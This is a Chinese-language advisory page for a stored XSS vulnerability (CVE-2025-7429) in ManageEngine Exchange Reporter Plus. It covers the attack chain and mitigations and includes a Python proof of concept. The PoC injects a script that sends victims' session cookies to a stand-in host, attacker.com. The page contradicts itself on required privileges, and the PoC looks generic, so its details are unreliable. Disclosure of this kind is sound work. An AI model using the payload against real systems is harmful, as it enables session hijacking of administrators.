CVE-2025-7429 CVSS 7.3 高危

CVE-2025-7429 ManageEngine Exchange Reporter Plus 存储型XSS漏洞

披露日期: 2025-11-11

来源: 0fc0942c-577d-436f-ae8e-945763c79b02

漏洞信息

漏洞编号

CVE-2025-7429

漏洞类型

存储型XSS

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Zohocorp ManageEngine Exchange Reporter Plus

漏洞概述

CVE-2025-7429是Zohocorp ManageEngine Exchange Reporter Plus中的一个高危存储型跨站脚本（Stored XSS）漏洞。该漏洞存在于Mails Deleted or Moved（邮件删除或移动）报告中，攻击者可以通过在报告功能中注入恶意JavaScript脚本，当其他用户查看该报告时，恶意代码将在其浏览器上下文中执行。由于漏洞位于服务器端存储，恶意脚本会被永久保存在系统中，影响所有访问该报告的用户。CVSS评分7.3，属于高危漏洞，攻击复杂度低，无需特殊权限即可实施攻击，但需要用户交互触发。成功利用此漏洞可导致敏感数据窃取、会话劫持、钓鱼攻击等严重安全风险。

技术细节

存储型XSS漏洞发生在用户提交的数据被服务器接收并存储后，在其他用户请求数据时未进行充分的输入验证和输出编码。ManageEngine Exchange Reporter Plus的Mails Deleted or Moved报告功能在处理邮件删除或移动记录时，未对用户可控的输入字段进行HTML实体编码或输入验证。攻击者可以通过构造包含恶意脚本的邮件操作请求（如删除或移动邮件），当系统生成报告时，恶意脚本会被嵌入到页面中。当具有查看报告权限的用户访问该报告页面时，浏览器会解析并执行嵌入的恶意JavaScript代码。由于该报告功能通常需要认证用户才能访问，攻击者可能利用低权限账户注入恶意代码，进而窃取高权限用户的会话令牌或凭据。

攻击链分析

STEP 1

步骤1

攻击者获取ManageEngine Exchange Reporter Plus的低权限账户访问权限

STEP 2

步骤2

攻击者在邮件删除或移动操作中注入包含恶意JavaScript的XSS payload

STEP 3

步骤3

系统将恶意脚本存储在数据库中，并在Mails Deleted or Moved报告中展示

STEP 4

步骤4

具有报告查看权限的管理员或其他用户访问该报告页面

STEP 5

步骤5

浏览器解析报告内容时执行恶意JavaScript代码，窃取Cookie或会话令牌

STEP 6

步骤6

攻击者利用窃取的会话信息劫持高权限用户身份，执行进一步恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests import json # CVE-2025-7429 PoC - Stored XSS in ManageEngine Exchange Reporter Plus # Target: ManageEngine Exchange Reporter Plus <= 5723 target_url = "http://target:8080" login_url = f"{target_url}/api/v1/auth/login" report_url = f"{target_url}/api/v1/reports/mails-deleted-moved" # Malicious XSS payload xss_payload = "<script>document.location='http://attacker.com/steal?c='+document.cookie</script>" session = requests.Session() # Step 1: Login with low-privilege account login_data = { "username": "low_priv_user", "password": "password123" } response = session.post(login_url, json=login_data) if response.status_code == 200: # Step 2: Submit mail operation with XSS payload mail_data = { "mailId": "12345", "operation": "delete", "subject": xss_payload, "from": "[email protected]" } submit_response = session.post(report_url, json=mail_data) # Step 3: When admin views the report, XSS will be triggered report_response = session.get(report_url) print(f"Report accessed, XSS payload stored successfully") else: print(f"Authentication failed")

影响范围

ManageEngine Exchange Reporter Plus <= 5723

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1）限制Mails Deleted or Moved报告的访问权限，仅允许必要人员访问；2）启用HTTPOnly和Secure标志保护Cookie；3）监控应用日志中的异常JavaScript代码模式；4）对报告功能启用输入长度限制；5）考虑临时禁用该报告功能直到漏洞修复；6）部署Web应用防火墙（WAF）规则拦截恶意脚本请求。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表